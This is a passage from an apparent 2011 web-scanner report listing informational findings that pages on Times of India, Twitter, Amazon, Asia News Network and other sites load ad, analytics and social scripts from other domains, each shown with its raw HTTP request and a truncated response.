The response dynamically includes the following script from another domain:

Request

GET /configspace/ads/googleshowbtm.html HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih; _chartbeat2=8l1yir8xsllibs89

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "064014c3f86fd0df974c92a4f12e7353:1305721720"
Last-Modified: Wed, 18 May 2011 12:28:40 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 2932
Cache-Control: max-age=120
Date: Sun, 04 Sep 2011 02:58:10 GMT
Connection: close

<style type="text/css">
<!--
a{text-decoration:none}
a:hover{text-decoration: underline}
-->
</style> <script language="JavaScript">
try{
var it_showhide=[1,1,1]; //Title,Description,URL
var it_title
...[SNIP]...
</script><script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.46. http://timesofindia.indiatimes.com/configspace/ads/googleshowtop.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /configspace/ads/googleshowtop.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /configspace/ads/googleshowtop.html HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih; _chartbeat2=8l1yir8xsllibs89

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "516e2d3104afd9cab169f2e2a4ff0add:1301466985"
Last-Modified: Wed, 30 Mar 2011 06:36:25 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 2774
Cache-Control: max-age=120
Date: Sun, 04 Sep 2011 02:58:28 GMT
Connection: close


<html>
<head>
<META http-equiv="Content-Type" content="text/html">
<style type="text/css">
               a{text-decoration:none}
               a:hover{text-decoration: underline}
               </style>
</head>
<body><script lang
...[SNIP]...
</script><script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.47. http://timesofindia.indiatimes.com/newtoolbar/9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /newtoolbar/9855193.cms

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newtoolbar/9855193.cms?args=0 HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; _chartbeat2=8l1yir8xsllibs89; RMFD=011R02OxO206Bs|O108EZ|O108i0|O108ih; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.4.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7725
Expires: Sun, 04 Sep 2011 06:11:12 GMT
Date: Sun, 04 Sep 2011 03:02:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" ><html xmlns:g="http://base.google.com/ns/1.0" xmlns:fb="http://www.facebook.com/2008/fbml"><head><META http-e
...[SNIP]...
</style><script src="https://apis.google.com/js/plusone.js" type="text/javascript"></script>
...[SNIP]...
<div onclick="loyalitypoints();facetrack();parent.logaction('715');" style="float:left;padding-top:6px;padding-right:14px;"><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...
<div onclick="loyalitypoints();tweetttrack();parent.logaction('716');" style="float:left;padding-right:15px;padding-top:7px;"><script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...

22.48. http://timesofindia.indiatimes.com/sponseredlinksros.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /sponseredlinksros.cms

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sponseredlinksros.cms HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CacheControl: public
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 2724
Expires: Sun, 04 Sep 2011 11:04:06 GMT
Date: Sun, 04 Sep 2011 02:36:02 GMT
Connection: close

<html>
<head>
<META http-equiv="Content-Type" content="text/html">
<style type="text/css">
               a{text-decoration:none}
               a:hover{text-decoration: underline}
               span.contentboxhead {<BR>font-f
...[SNIP]...
</script><script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.49. http://timesofindia.indiatimes.com/toifanapp.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /toifanapp.cms

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /toifanapp.cms HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 404
Expires: Sun, 04 Sep 2011 02:36:11 GMT
Date: Sun, 04 Sep 2011 02:36:11 GMT
Connection: close

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<table align="center" cellpadding="0" cellspacing="0" border="0">
<script src="http://static.ak.connect.facebook.com/connect.php/en_US" type="text/javascript"></script>
...[SNIP]...

22.50. http://timesofindia.indiatimes.com/toitopics_googleads.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /toitopics_googleads.cms

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /toitopics_googleads.cms?type=1 HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _chartbeat2=8l1yir8xsllibs89; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.5.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 3045
Expires: Sun, 04 Sep 2011 02:33:51 GMT
Date: Sun, 04 Sep 2011 02:33:51 GMT
Connection: close

<html><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><style type="text/css">a{text-decoration:none}
a:hover{text-decoration: underline}</style></head><body><script language="
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" language="JavaScript"></script>
...[SNIP]...

22.51. http://timesofindia.indiatimes.com/topic/Xss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /topic/Xss

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /topic/Xss HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
Content-Length: 95
Cache-Control: max-age=0
Origin: http://timesofindia.indiatimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.4.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _chartbeat2=8l1yir8xsllibs89; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948

type=&catkey=233446897&search=3&sitesearch=&fields=1&searchtype=2&article=2&search1=0&query=xss

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Sun, 04 Sep 2011 02:33:28 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 41205
Expires: Sun, 04 Sep 2011 04:23:09 GMT
Date: Sun, 04 Sep 2011 02:33:44 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" ><html><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="text/html; char
...[SNIP]...
</noscript><script src="//secure-uk.imrworldwide.com/v60.js" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

22.52. http://twitter.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:21:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315110098-90234-27276
ETag: "402a4c8b99efa81d3ed3203f1a07dd26"
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 04:21:38 GMT
X-Runtime: 0.02844
Content-Type: text/html; charset=utf-8
Content-Length: 20340
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 4a8383b6427efce124e60f7521caec80b5ffa38e
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYjZkY2M5NzIzY2Y2MDkzNGExMDQyMGU1Y2IzMDk4%250AYTk6DnJldHVybl90byIdaHR0cHM6Ly90d2l0dGVyLmNvbS9ob21lOhVpbl9u%250AZXdfdXNlcl9mbG93MDoPY3JlYXRlZF9hdGwrCJ5MXDIyASIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AADoHaWQiJTg4NjQwZTVmNWYzYTk4ODk4NWJjOTU0ZmI4YzlmNmU5--787a4de76984eb9be102d7b7a1c076115411b8e1; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
</h2>

<script src="http://a0.twimg.com/a/1314996488/javascripts/widgets/widget.js?1314639322" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1314996488/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

22.53. http://web.adblade.com/impsc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /impsc.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /impsc.php?cid=1083-2742610312&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315103963.766653954479; expires=Mon, 05-Sep-2011 02:39:23 GMT; path=/
Content-type: text/html
Date: Sun, 04 Sep 2011 02:39:23 GMT
Server: lighttpd/1.4.21
Content-Length: 8255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html;
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End Quantcast tag -->
<script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=140&pubId=11479&campId=4725"></script>
...[SNIP]...

22.54. http://www.addthis.com/bookmark.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92716

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/20110825162931/js/bookmark.js"></script>
...[SNIP]...

22.55. http://www.amazon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:16 GMT
Server: Server
Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Sun, 04-Sep-2011 04:23:16 GMT
x-amz-id-1: 19A6WP3ZDHGN69NMDWGD
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: WttjoioY2sh+9lVqwvX+MQ2r9X2rIBXb/ay0wwdr2lLUBl2LD2VMSFtd29Gdj24p
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 211142


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<!-- oi -->
<script type='text/
...[SNIP]...
</script>

<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-js-1.2.6-beacon/site-wide-11529410676.js._V152235497_.js"></script>
...[SNIP]...

22.56. http://www.amazon.com/dp/B002Y27P3M  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /dp/B002Y27P3M

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dp/B002Y27P3M HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:29 GMT
Server: Server
x-amz-id-1: 0717BXYES9PSJDQ1V2PY
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 1h6yE7wC1G8+JuE1Y1AtympRDo7XFCIGa8bMXRuR2y3e/Mqpf/5EOYAbk5K5ufGC
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 786246


<html>
<head>
<!-- oi -->
<scr
...[SNIP]...
</script>

<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-js-1.2.6-beacon/site-wide-11529410676.js._V152235497_.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/twister/beta/twister-dpf.305a84d891976e1ae537ea4423b9ae91._V1_.js"></script>
...[SNIP]...

22.57. http://www.asianewsnet.net/climate/detail.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asianewsnet.net
Path:   /climate/detail.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /climate/detail.php HTTP/1.1
Host: www.asianewsnet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12591


<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="Keywords" content="asia, news, network, Southeast Asia, Business, Viewpoint, Hot
...[SNIP]...
<!--BEGIN WEB STAT CODE-->
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028969.js"></SCRIPT>
...[SNIP]...

22.58. http://www.asianewsnet.net/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asianewsnet.net
Path:   /home/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/ HTTP/1.1
Host: www.asianewsnet.net
Proxy-Connection: keep-alive
Referer: http://feed.mikle.com/feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:30:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51103

<html>
<head>
<title>ASIA NEWS NETWORK</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="Keywords" content="asia, news, network, Southeast Asia, Business, Vi
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<!--BEGIN WEB STAT CODE-->
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028969.js"></SCRIPT>
...[SNIP]...

22.59. http://www.asianewsnet.net/home/epaper.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asianewsnet.net
Path:   /home/epaper.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/epaper.php HTTP/1.1
Host: www.asianewsnet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51206


<html>
<head>
<title>ASIA NEWS NETWORK</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="Keywords" content="asia, news, network, Southeast Asia, Busines
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!--BEGIN WEB STAT CODE-->
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028969.js"></SCRIPT>
...[SNIP]...

22.60. http://www.asianewsnet.net/home/highlight.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asianewsnet.net
Path:   /home/highlight.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/highlight.php HTTP/1.1
Host: www.asianewsnet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18771


<html>
<head>
<title>ASIA NEWS NETWORK</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="Keywords" content="asia, news, network, Southeast Asia, Busine
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<!--BEGIN WEB STAT CODE-->
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028969.js"></SCRIPT>
...[SNIP]...

22.61. http://www.asianewsnet.net/home/news.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asianewsnet.net
Path:   /home/news.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/news.php HTTP/1.1
Host: www.asianewsnet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
